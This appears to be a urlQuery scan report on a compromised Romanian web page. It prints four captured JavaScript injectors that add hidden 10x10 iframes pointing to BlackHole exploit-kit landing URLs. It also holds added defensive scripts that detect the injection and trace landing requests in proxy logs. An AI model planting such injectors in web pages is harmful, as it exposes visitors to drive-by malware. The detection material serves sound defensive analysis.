Overview

URL: http://danielboldan.transproject.ro/~rtra3104
IP: 89.42.216.18
ASN: AS5606 GTS Telecom SRL
Location: Romania
Report completed: 2012-11-06 07:11:19 CET
urlQuery Alerts:
  - Detected malicious iframe injection
  - Detected BlackHole v1.x exploit kit URL pattern


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (none)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro: No alerts detected
Snort w/ Sourcefire VRT: No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 89.42.216.18

Date                | Alerts / IDS | URL                                             | IP
2013-02-11 17:05:19 | 1 / 3        | http://danielboldan.transproject.ro/~rtra3104/  | 89.42.216.18
2013-01-07 22:58:20 | 1 / 1        | http://california-co.ro/                        | 89.42.216.18
2012-12-24 03:07:17 | 1 / 0        | http://www.ambasadorband.ro/index.html          | 89.42.216.18
2012-12-09 06:59:38 | 2 / 2        | http://hotel-roberto.ro/                        | 89.42.216.18
2012-11-12 20:54:30 | 3 / 5        | http://danielboldan.transproject.ro/            | 89.42.216.18
2012-11-07 05:20:07 | 1 / 0        | http://ambasadorband.ro/                        | 89.42.216.18

Last 6 reports on ASN: AS5606 GTS Telecom SRL

Date                | Alerts / IDS | URL                                                                                              | IP
2013-02-14 16:56:35 | 0 / 3        | http://img.youtube.com.internet3g.ro/rawk.php                                                    | 89.42.219.146
2013-02-14 10:55:07 | 1 / 5        | http://www.manufacturalorelai.ro/contact/                                                        | 85.9.47.230
2013-02-14 10:54:52 | 1 / 5        | http://manufacturalorelai.ro/contact                                                             | 85.9.47.230
2013-02-14 10:30:28 | 0 / 0        | http://www.catalog-piese.ro/js/jquery/fancybox/fancy_shadow_sw.png                               | 89.42.216.167
2013-02-14 10:28:15 | 0 / 0        | http://www.catalog-piese.ro/js/jquery/fancybox/fancy_shadow_s.png                                | 89.42.216.167
2013-02-14 05:04:52 | 2 / 1        | http://editurasimplu.ro/autori-romani-barbustefanescu-delavrancea-c-44_55=.html?products_id=226  | 89.42.219.205

Last 3 reports on domain: danielboldan.transproject.ro

Date                | Alerts / IDS | URL                                             | IP
2013-02-11 17:05:19 | 1 / 3        | http://danielboldan.transproject.ro/~rtra3104/  | 89.42.216.18
2012-11-12 20:54:30 | 3 / 5        | http://danielboldan.transproject.ro/            | 89.42.216.18
2012-11-06 23:35:33 | 2 / 0        | http://danielboldan.transproject.ro/~rtra3104/  | 89.42.216.18



JavaScript

Executed Scripts (6)


Executed Evals (4)

#1 JavaScript::Eval (size: 617, repeated: 1)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://historuofthowers.com/main.php?page=4c8dc3486657031c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://historuofthowers.com/main.php?page=4c8dc3486657031c');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 615, repeated: 1) - Alert detected on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://ohioswingersbus.com/main.php?page=887c73c59dbbfc05' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://ohioswingersbus.com/main.php?page=887c73c59dbbfc05');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#3 JavaScript::Eval (size: 611, repeated: 1)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://storylootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://storylootybuz.com/main.php?page=6eb5b7677d651df4');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#4 JavaScript::Eval (size: 619, repeated: 1)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}
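
All four evals are the same injector with only the landing domain and page token changed: a 10x10 iframe hidden with visibility:hidden is appended to the body once it exists, with document.write() as the fallback before the body is parsed, and its src is main.php?page=<16 hex chars>, the BlackHole v1.x landing URL pattern behind the report's second alert. The script below is an added example, not part of the urlQuery report or of the captured code, showing how to pull the iframe targets out of such a captured eval and reproduce the report's two verdicts. Both inputs are constructed: the injected snippet is a copy of eval #1 above, the benign snippet is an invented visible embed (player.example.com is a placeholder), and the 20-pixel "tiny frame" threshold is an assumption.

```javascript
// Added example (not from the urlQuery report): analyse a captured eval()
// payload for a hidden-iframe injection and BlackHole v1.x landing URLs.

// Iframe target in either form the injector uses:
//   document.write("<iframe src='URL' ...")   and   f.setAttribute('src', 'URL')
const IFRAME_SRC_RE =
  /(?:<iframe[^>]*?\bsrc=|setAttribute\(\s*['"]src['"]\s*,\s*)['"]([^'"]+)['"]/gi;

// BlackHole v1.x landing page as seen in this report: /main.php?page=<16 hex chars>.
const BLACKHOLE_V1_RE = /^https?:\/\/[^\/?#]+\/main\.php\?page=[0-9a-f]{16}$/i;

// The injector hides the frame with visibility:hidden (inline style or f.style.visibility).
const HIDDEN_RE = /visibility\s*[:=]\s*['"]?hidden/i;

// Frames at or below this many pixels on both axes count as "tiny" (assumed threshold).
const TINY_PX = 20;

function extractIframeSources(script) {
  const urls = new Set();
  for (const m of script.matchAll(IFRAME_SRC_RE)) urls.add(m[1]);
  return [...urls];
}

function isBlackholeV1Landing(url) {
  return BLACKHOLE_V1_RE.test(url);
}

// First width/height assignment in the script, whether written as width='10'
// or setAttribute('width', '10'); returns {} when none is present.
function frameDimensions(script) {
  const dims = {};
  for (const name of ["width", "height"]) {
    const m = new RegExp(`\\b${name}\\W{1,6}(\\d+)`, "i").exec(script);
    if (m) dims[name] = Number(m[1]);
  }
  return dims;
}

function analyzeEval(script) {
  const sources = extractIframeSources(script);
  const dims = frameDimensions(script);
  const hiddenFrame = HIDDEN_RE.test(script);
  const tinyFrame =
    "width" in dims && "height" in dims && dims.width <= TINY_PX && dims.height <= TINY_PX;
  const blackholeUrls = sources.filter(isBlackholeV1Landing);
  const verdicts = [];
  if (sources.length > 0 && hiddenFrame && tinyFrame) verdicts.push("malicious iframe injection");
  if (blackholeUrls.length > 0) verdicts.push("BlackHole v1.x exploit kit URL pattern");
  return {
    sources,
    hiddenFrame,
    tinyFrame,
    blackholeUrls,
    landingHosts: blackholeUrls.map((u) => new URL(u).hostname),
    verdicts,
  };
}

// Constructed inputs: a copy of eval #1 from this report, and an invented
// visible embed (player.example.com is a placeholder) that must not alert.
const INJECTED_EVAL = `
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
  document.write("<iframe src='http://historuofthowers.com/main.php?page=4c8dc3486657031c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://historuofthowers.com/main.php?page=4c8dc3486657031c');
  f.style.visibility = 'hidden'; f.style.position = 'absolute';
  f.setAttribute('width', '10'); f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}`;

const BENIGN_EVAL = `
var f = document.createElement('iframe');
f.setAttribute('src', 'https://player.example.com/embed/abc123');
f.setAttribute('width', '560'); f.setAttribute('height', '315');
document.body.appendChild(f);`;

console.log(JSON.stringify(analyzeEval(INJECTED_EVAL), null, 2));
console.log("benign verdicts:", JSON.stringify(analyzeEval(BENIGN_EVAL).verdicts));
```

Run it with node; the injected snippet yields both verdicts and the host historuofthowers.com as an IOC, the benign embed yields none. The two checks are deliberately independent: the hidden 10x10 frame fires on any injector of this shape, while the URL regex is specific to this kit version and will stop matching once the landing path changes.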

Executed Writes (0)



HTTP Transactions (8)


Transaction 1 of 8

Request:
GET /~rtra3104 HTTP/1.1
Host: danielboldan.transproject.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Date: Tue, 06 Nov 2012 06:10:43 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Location: http://danielboldan.transproject.ro/~rtra3104/
Content-Length: 413

Transaction 2 of 8

Request:
GET /favicon.ico HTTP/1.1
Host: danielboldan.transproject.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 06 Nov 2012 06:10:43 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389

Transaction 3 of 8

Request:
GET /favicon.ico HTTP/1.1
Host: danielboldan.transproject.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 06 Nov 2012 06:10:43 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389

Transaction 4 of 8

Request:
GET /favicon.ico HTTP/1.1
Host: danielboldan.transproject.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 06 Nov 2012 06:10:46 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389

Transaction 5 of 8

Request:
GET /~rtra3104/ HTTP/1.1
Host: danielboldan.transproject.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Tue, 06 Nov 2012 06:10:43 GMT
Accept-Ranges: bytes
Connection: close
Etag: "1f5c6-4fc4ba5f-0"
Last-Modified: Tue, 29 May 2012 12:00:31 GMT
Content-Length: 22052

Transaction 6 of 8

Request:
GET /main.php?page=4d81d4c54d71b36c HTTP/1.1
Host: jahdivideoners.su
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://danielboldan.transproject.ro/~rtra3104/

Response: (none recorded in this report)

Transaction 7 of 8

Request:
GET /main.php?page=4c8dc3486657031c HTTP/1.1
Host: historuofthowers.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://danielboldan.transproject.ro/~rtra3104/

Response: (none recorded in this report)

Transaction 8 of 8

Request:
GET /~rtra3104/ HTTP/1.1
Host: danielboldan.transproject.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Range: bytes=5808-
If-Range: "1f5c6-4fc4ba5f-0"

Response:
HTTP/1.1 206 Partial Content
Content-Type: text/html
Date: Tue, 06 Nov 2012 06:10:43 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: "1f5c6-4fc4ba5f-0"
Last-Modified: Tue, 29 May 2012 12:00:31 GMT
Content-Range: bytes 5808-128453/128454
Content-Length: 122646
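
The two requests for main.php?page=<token> carry Referer: http://danielboldan.transproject.ro/~rtra3104/, which is what ties an exploit-kit landing request back to the compromised page that injected it; neither landing server returned a response in this report, and the IDS signatures above saw nothing, so the URL pattern plus the referer chain is what an analyst has to work from in proxy logs. The script below is an added example, not part of the urlQuery report, that applies that linkage to constructed proxy log lines in combined format with the full request URL (the form a forward proxy emits). The hosts, paths and timestamp come from this report; the client addresses 10.0.0.7 and 10.0.0.9 and the byte counts are invented.

```javascript
// Added example (not from the urlQuery report): find exploit-kit landing
// requests in proxy logs and tie them to the referring (compromised) page.

// BlackHole v1.x landing page as seen in this report: /main.php?page=<16 hex chars>.
const BLACKHOLE_V1_RE = /^https?:\/\/[^\/?#]+\/main\.php\?page=[0-9a-f]{16}$/i;

// Combined log format with the full URL in the request line:
//   client ident user [time] "METHOD URL HTTP/x" status bytes "referer" "user-agent"
const COMBINED_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"/;

function parseLine(line) {
  const m = COMBINED_RE.exec(line);
  if (!m) return null;
  return {
    client: m[1],
    time: m[2],
    method: m[3],
    url: m[4],
    status: Number(m[5]),
    referer: m[7] === "-" ? null : m[7],
    userAgent: m[8],
  };
}

// Returns every landing-page hit plus a map referer -> Set(landing hosts).
// A referer on a site you operate is the page that needs to be pulled and cleaned.
function findExploitKitChains(lines) {
  const hits = [];
  const chains = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || !BLACKHOLE_V1_RE.test(e.url)) continue;
    hits.push(e);
    const key = e.referer || "(no referer)";
    if (!chains.has(key)) chains.set(key, new Set());
    chains.get(key).add(new URL(e.url).hostname);
  }
  return { hits, chains };
}

// Flat summary for a ticket: referring pages, landing hosts, and clients that reached them.
function summarize({ hits, chains }) {
  return {
    compromisedPages: [...chains.keys()],
    landingHosts: [...new Set(hits.map((h) => new URL(h.url).hostname))].sort(),
    clients: [...new Set(hits.map((h) => h.client))].sort(),
  };
}

const UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13";
// Constructed lines: hosts, paths and timestamp from this report; client IPs and byte counts invented.
const SAMPLE_LOG = [
  `10.0.0.7 - - [06/Nov/2012:06:10:43 +0000] "GET http://danielboldan.transproject.ro/~rtra3104/ HTTP/1.1" 200 22052 "-" "${UA}"`,
  `10.0.0.7 - - [06/Nov/2012:06:10:43 +0000] "GET http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c HTTP/1.1" 200 4120 "http://danielboldan.transproject.ro/~rtra3104/" "${UA}"`,
  `10.0.0.7 - - [06/Nov/2012:06:10:43 +0000] "GET http://historuofthowers.com/main.php?page=4c8dc3486657031c HTTP/1.1" 200 4120 "http://danielboldan.transproject.ro/~rtra3104/" "${UA}"`,
  `10.0.0.9 - - [06/Nov/2012:06:11:02 +0000] "GET http://www.example.com/main.php?page=2 HTTP/1.1" 200 512 "-" "${UA}"`,
  "not a log line at all",
];

const result = findExploitKitChains(SAMPLE_LOG);
console.log(JSON.stringify(summarize(result), null, 2));
```

The fourth sample line (a main.php?page=2 on an unrelated host) is there to show that the match is on the 16-hex token, not on main.php alone; the malformed last line is skipped rather than crashing the run. Pivot on the clients list for host triage, and on compromisedPages for site cleanup.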